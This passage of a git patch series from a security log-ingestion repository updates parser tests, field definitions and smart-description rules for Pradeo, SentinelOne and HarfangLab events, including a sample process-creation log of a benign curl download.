\"system\": \"Android\"\n                    },\n                    \"version\": \"491.0.0.58.78\",\n                    \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n                    \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n                    \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n                    \"name\": \"App\",\n                    \"versionCode\": \"457215664\",\n                    \"size\": \"64262264\"\n                },\n                \"device\": {\n                    \"id\": \"device_id01\",\n                    \"serialNumber\": \"unknown\",\n                    \"imei\": null,\n                    \"name\": \"John\",\n                    \"email\": null,\n                    \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n                    \"byod\": false,\n                    \"lockPassword\": null,\n                    \"knoxVersion\": null,\n                    \"declaredOperatingSystem\": \"Android\",\n                    \"declaredOperatingSystemVersion\": \"10.0.0\",\n                    \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n                    \"declaredModel\": \"MODEL 01\",\n                    \"enrollmentStatus\": {\n                        \"id\": \"enrollid_12\",\n                        \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n                        \"coupled\": true\n                    },\n                    \"emmDeviceInfo\": null\n                },\n                \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n                \"uninstalledAt\": null,\n                \"native\": false\n            },\n            \"matchedResponseRules\": [\n                {\n                    \"id\": \"matched_response_id\",\n                    \"matchConditions\": [\n                        {\n                            \"type\": \"threatLevelIs\",\n                            \"value\": \"Red\"\n                        }\n                    ],\n                    \"notifyAdministrator\": false,\n                    \"onDeviceNotification\": false,\n                    \"action\": \"Disapproved\",\n                    \"responseRuleset\": {\n                        \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n                        \"name\": \"FallBack\",\n                        \"active\": true,\n                        \"type\": \"FallBack\",\n                        \"priority\": 0\n                    },\n                    \"priority\": 0\n                }\n            ]\n        }\n    },\n    \"user\": null,\n    \"device\": null,\n    \"company\": {\n        \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n        \"name\": \"LAB\",\n        \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n        \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n        \"deletedAt\": null\n    }\n}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Pradeo MTD",
+        "dialect_uuid": "3cedbe29-02f8-42bf-9ec2-0158186c2827"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\n    \"id\": \"1234567890\",\n    \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n    \"source\": \"system\",\n    \"category\": null,\n    \"type\": \"DeviceApplicationComplianceUpdated\",\n    \"content\": {\n        \"deviceApplicationCompliance\": {\n            \"id\": \"abcdef123456\",\n            \"status\": \"Disapproved\",\n            \"computed\": true,\n            \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n            \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n            \"deviceApplication\": {\n                \"id\": \"123456789ABCDEF\",\n                \"application\": {\n                    \"id\": \"azertyuiop\",\n                    \"package\": {\n                        \"id\": \"1234abcd\",\n                        \"package\": \"com.app.test\",\n                        \"system\": \"Android\"\n                    },\n                    \"version\": \"491.0.0.58.78\",\n                    \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n                    \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n                    \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n                    \"name\": \"App\",\n                    \"versionCode\": \"457215664\",\n                    \"size\": \"64262264\"\n                },\n                \"device\": {\n                    \"id\": \"device_id01\",\n                    \"serialNumber\": \"unknown\",\n                    \"imei\": null,\n                    \"name\": \"John\",\n                    \"email\": null,\n                    \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n                    \"byod\": false,\n                    \"lockPassword\": null,\n                    \"knoxVersion\": null,\n                    \"declaredOperatingSystem\": \"Android\",\n                    \"declaredOperatingSystemVersion\": \"10.0.0\",\n                    \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n                    \"declaredModel\": \"MODEL 01\",\n                    \"enrollmentStatus\": {\n                        \"id\": \"enrollid_12\",\n                        \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n                        \"coupled\": true\n                    },\n                    \"emmDeviceInfo\": null\n                },\n                \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n                \"uninstalledAt\": null,\n                \"native\": false\n            },\n            \"matchedResponseRules\": [\n                {\n                    \"id\": \"matched_response_id\",\n                    \"matchConditions\": [\n                        {\n                            \"type\": \"threatLevelIs\",\n                            \"value\": \"Red\"\n                        }\n                    ],\n                    \"notifyAdministrator\": false,\n                    \"onDeviceNotification\": false,\n                    \"action\": \"Disapproved\",\n                    \"responseRuleset\": {\n                        \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n                        \"name\": \"FallBack\",\n                        \"active\": true,\n                        \"type\": \"FallBack\",\n                        \"priority\": 0\n                    },\n                    \"priority\": 0\n                }\n            ]\n        }\n    },\n    \"user\": null,\n    \"device\": null,\n    \"company\": {\n        \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n        \"name\": \"LAB\",\n        \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n        \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n        \"deletedAt\": null\n    }\n}",
+    "event": {
+      "action": "DeviceApplicationComplianceUpdated",
+      "category": [
+        "process"
+      ],
+      "type": [
+        "change"
+      ]
+    },
+    "@timestamp": "2024-11-27T04:10:33.460000Z",
+    "pradeo": {
+      "application": {
+        "id": "azertyuiop",
+        "md5": "0fccfdefc882c4be6d2a938001184e08",
+        "name": "App",
+        "package": "com.app.test",
+        "sha1": "749c94cd972726ef2b3ccda7e718a2034cc9f6ac",
+        "sha256": "278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8",
+        "system": "Android",
+        "version": "491.0.0.58.78",
+        "versionCode": "457215664"
+      },
+      "device": {
+        "byod": false,
+        "coupled": true,
+        "declaredModel": "MODEL 01",
+        "declaredOperatingSystem": "Android",
+        "declaredOperatingSystemSecurityPatchDate": "2020-09-01T00:00:00Z",
+        "declaredOperatingSystemVersion": "10.0.0",
+        "id": "device_id01",
+        "lastConnection": "2024-11-27T04:07:32Z",
+        "name": "John",
+        "serialNumber": "unknown"
+      },
+      "metadata": {
+        "creationDate": "2024-11-27T04:10:33.460000Z",
+        "id": "1234567890",
+        "source": "system",
+        "type": "DeviceApplicationComplianceUpdated"
+      }
+    }
+  }
+}
\ No newline at end of file

From 6335db5a7e01d89222de436ad488b49a3bc3ae93 Mon Sep 17 00:00:00 2001
From: vg-svitla <v.huriev@svitla.com>
Date: Tue, 10 Dec 2024 16:26:06 +0200
Subject: [PATCH 315/317] Fix: SentinelOne smart descriptions

---
 .../_meta/smart-descriptions.json             | 52 ++++++++++
 .../tests/process_processcreation_2.json      | 96 +++++++++++++++++++
 2 files changed, 148 insertions(+)
 create mode 100644 SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json

diff --git a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json
index 9a4b1bf43..9acf6e91d 100644
--- a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json
+++ b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json
@@ -682,6 +682,58 @@
       }
     ]
   },
+  {
+    "value": "Process {process.command_line} was created by {process.user.name}",
+    "conditions": [
+      {
+        "field": "event.action",
+        "value": "Process Creation"
+      },
+      {
+        "field": "process.user.name"
+      },
+      {
+        "field": "process.command_line"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "process.user.name",
+        "target": "process.parent.command_line",
+        "type": "created"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.parent.title",
+        "type": "has process title"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.parent.name",
+        "type": "has name"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.title",
+        "type": "has title"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.name",
+        "type": "has name"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.command_line",
+        "type": "created"
+      },
+      {
+        "source": "process.user.name",
+        "target": "host.name",
+        "type": "logged on"
+      }
+    ]
+  },
   {
     "value": "Process {process.command_line} was created by {user.name}",
     "conditions": [
diff --git a/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json
new file mode 100644
index 000000000..62320459c
--- /dev/null
+++ b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json
@@ -0,0 +1,96 @@
+{
+  "input": {
+    "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"<Type=Apple\\/ID=com.apple.curl>\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}"
+  },
+  "expected": {
+    "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"<Type=Apple\\/ID=com.apple.curl>\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}",
+    "event": {
+      "action": "Process Creation",
+      "category": [
+        "process"
+      ],
+      "dataset": "cloud-funnel-2.0",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-12-05T08:18:51.479000Z",
+    "agent": {
+      "version": "23.3.1.7037"
+    },
+    "deepvisibility": {
+      "agent": {
+        "managment_url": "mgm-testing-test.sentinelone.net",
+        "trace_id": "XXXXXXX-XXXXXXXX-XXXXXXX",
+        "uuid": "xxxx-XXXXXX-XXXXx-xxxxx"
+      },
+      "event": {
+        "category": "process",
+        "type": "Process Creation"
+      },
+      "host": {
+        "os": {
+          "revision": "14.7.1 (23H222)"
+        }
+      },
+      "process": {
+        "target": {
+          "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip",
+          "executable": "/usr/bin/curl",
+          "hash": {
+            "md5": "fe61928bbd84ed16fc4f934307bf2f16",
+            "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a",
+            "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42"
+          },
+          "name": "curl",
+          "storyline_id": "EE9FB66D-9B03-4286-971C-7A20615D157B",
+          "title": "curl",
+          "working_directory": "/usr/bin"
+        }
+      }
+    },
+    "host": {
+      "name": "LMFR0205",
+      "os": {
+        "family": "osx",
+        "name": "OS X"
+      },
+      "type": "laptop"
+    },
+    "observer": {
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip",
+      "executable": "/usr/bin/curl",
+      "hash": {
+        "md5": "fe61928bbd84ed16fc4f934307bf2f16",
+        "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a",
+        "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42"
+      },
+      "name": "curl",
+      "pid": 30273,
+      "start": "2024-12-05T08:18:51.479000Z",
+      "title": "curl",
+      "user": {
+        "name": "test.user"
+      },
+      "working_directory": "/usr/bin"
+    },
+    "related": {
+      "hash": [
+        "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42",
+        "e817c506298dc8a2dba727562b6efc60dcf4db1a",
+        "fe61928bbd84ed16fc4f934307bf2f16"
+      ]
+    },
+    "url": {
+      "domain": "test.test",
+      "original": "https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip",
+      "path": "/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip",
+      "port": 443,
+      "scheme": "https",
+      "subdomain": "test"
+    }
+  }
+}
\ No newline at end of file

From 061e9656533eac6955dba9be73a10123daef8bdc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A9na=C3=AFg?=
 <126670263+LenaigKaliou@users.noreply.github.com>
Date: Tue, 10 Dec 2024 16:50:08 +0100
Subject: [PATCH 316/317] Update HarfangLab/harfanglab/ingest/parser.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 HarfangLab/harfanglab/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 96338037d..c09e780c2 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -143,7 +143,7 @@ stages:
           url.original: "{{json_event.message.details_url_request.url}}"
 
       - set:
-          agent.id: "{{json_event.message.agents[0].agent_id}}"
+          harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}"
         filter: "{{json_event.message.agents | length > 0}}"
 
   network_info:

From cd0a5dc4c25145de4300b3c9fcfda65fd65dcbd3 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 10 Dec 2024 16:57:25 +0100
Subject: [PATCH 317/317] fixes on fields and typo

---
 HarfangLab/harfanglab/_meta/fields.yml           | 5 +++++
 HarfangLab/harfanglab/ingest/parser.yml          | 2 +-
 HarfangLab/harfanglab/tests/threat_critical.json | 4 +++-
 HarfangLab/harfanglab/tests/threat_log.json      | 5 ++++-
 4 files changed, 13 insertions(+), 3 deletions(-)

diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index 611f3c079..902363c55 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -953,6 +953,11 @@ action.properties.param9:
   name: action.properties.param9
   type: keyword
 
+harfanglab.agent_ids:
+  description: ''
+  name: harfanglab.agent_ids
+  type: keyword
+
 harfanglab.aggregation_key:
   description: The key to the events aggregation
   name: harfanglab.aggregation_key
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index c09e780c2..34535641b 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -143,7 +143,7 @@ stages:
           url.original: "{{json_event.message.details_url_request.url}}"
 
       - set:
-          harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}"
+          harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}}"
         filter: "{{json_event.message.agents | length > 0}}"
 
   network_info:
diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json
index e9b50e3db..ce1d2faa4 100644
--- a/HarfangLab/harfanglab/tests/threat_critical.json
+++ b/HarfangLab/harfanglab/tests/threat_critical.json
@@ -10,10 +10,12 @@
       "start": "2024-03-19T09:21:00Z"
     },
     "agent": {
-      "id": "af5e2f63-becd-4660-ade8-30d04c0dd044",
       "name": "harfanglab"
     },
     "harfanglab": {
+      "agent_ids": [
+        "af5e2f63-becd-4660-ade8-30d04c0dd044"
+      ],
       "count": {
         "rules": 1,
         "users_impacted": 0
diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json
index 233ffd066..bed91707b 100644
--- a/HarfangLab/harfanglab/tests/threat_log.json
+++ b/HarfangLab/harfanglab/tests/threat_log.json
@@ -10,10 +10,13 @@
       "start": "2024-02-07T15:18:00Z"
     },
     "agent": {
-      "id": "215fe295-905f-4a8d-8347-e9d438d4e415",
       "name": "harfanglab"
     },
     "harfanglab": {
+      "agent_ids": [
+        "215fe295-905f-4a8d-8347-e9d438d4e415",
+        "999ba0c7-96b8-4c57-bf0e-63b24813c873"
+      ],
       "count": {
         "rules": 4,
         "users_impacted": 3